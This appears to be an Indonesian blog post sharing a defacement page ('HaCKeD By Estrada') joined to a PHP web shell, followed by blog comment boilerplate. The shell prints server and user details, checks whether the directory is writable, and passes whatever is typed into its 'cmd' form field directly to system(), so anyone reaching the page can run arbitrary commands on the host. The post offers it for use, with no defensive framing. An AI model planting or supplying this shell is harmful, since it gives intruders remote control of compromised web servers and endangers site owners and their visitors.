sambungan inject php

</body>
</html>
<html>
<head>

<title>Estrada</title>

</head>

<body>
<script language=”JavaScript”>
<!– Begin
var months=new Array(13);
months[1]=”January”;
months[2]=”February”;
months[3]=”March”;
months[4]=”April”;
months[5]=”May”;
months[6]=”June”;
months[7]=”July”;
months[8]=”August”;
months[9]=”September”;
months[10]=”October”;
months[11]=”November”;
months[12]=”December”;
var time=new Date();
var lmonth=months[time.getMonth() + 1];
var date=time.getDate();
var year=time.getYear();
if (year < 2000)    // Y2K Fix, Isaac Powell
year = year + 1900;
document.write(“<center>” + lmonth + ” “);
document.write(date + “, ” + year + “</center>”);
// End –>
</script>
</center>

<html>

<head>
<meta http-equiv=”Content-Language” content=”en-us”>
<meta name=”GENERATOR” content=”Microsoft FrontPage 5.0″>
<meta name=”ProgId” content=”FrontPage.Editor.Document”>
<meta http-equiv=”Content-Type” content=”text/html; charset=windows-1252″>
<title>-=|fuck|=-</title>
</head>

<body text=”#FFFFFF” bgcolor=”#000000″>

<p align=”center”><b><font face=”Algerian” size=”7″>HaCKeD By Estrada</font></b></p>
<p align=”center”>&nbsp;</p>
<center><img src=”http://www.coolgifs.de/gifs/skelette/mail.gif&#8221; alt=”sOlo TecHnoLoGy”></center><br /><br />
</body>

</html>

<?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == “”) $chdir = getcwd( );
if(!$whoami)$whoami=exec(“whoami”);
?>
<br>
<TABLE BORDER=”0″ CELLPADDING=”0″ CELLSPACING=”0″>
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Current Path:</b> <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo “Yes”; }else{ echo “No”; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Server Services:</b> <?= “$SERVER_SOFTWARE $SERVER_VERSION”; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Server Adress:</b> <?= “$SERVER_ADDR $SERVER_NAME”; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Script Current User:</b> <?= $user ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>PHP Version:</b> <?= $ver ?></DIV></TD>
</TR>
</TABLE>
<BR>
<font face=”courier new” size=”2″ color=”777777″>
<b>#</b>D-3-D php : <br>
<FORM name=injection METHOD=POST ACTION=”<?php echo $_SERVER[“REQUEST_URI”];?>”>
cmd :
<INPUT TYPE=”text” NAME=”cmd” value=”<?php echo stripslashes(htmlentities($_POST[‘cmd’])); ?>” size=”161″>
<br>
<INPUT TYPE=”submit”>
</FORM>
<hr color=777777 width=100% height=115px>
</font>
<pre>
<?
$cmd = $_POST[‘cmd’];
if (isset($chdir)) @chdir($chdir);
ob_start();
system(“$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “&gt;”, str_replace(“<“, “&lt;”, $output));
?>
</pre>
<hr color=777777 width=100% height=115px>
<font face=”courier new” size=”2″ color=”777777″>
<p align=”center”><b><font face=”Algerian” size=”7″>.:sOlo TecHnoLoGy Corps:.</U></b></marquee>
</font>
</body>
</div>

2 Tanggapan to “sambungan inject php”

  1. Great Information, I really like it. Keep posting.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: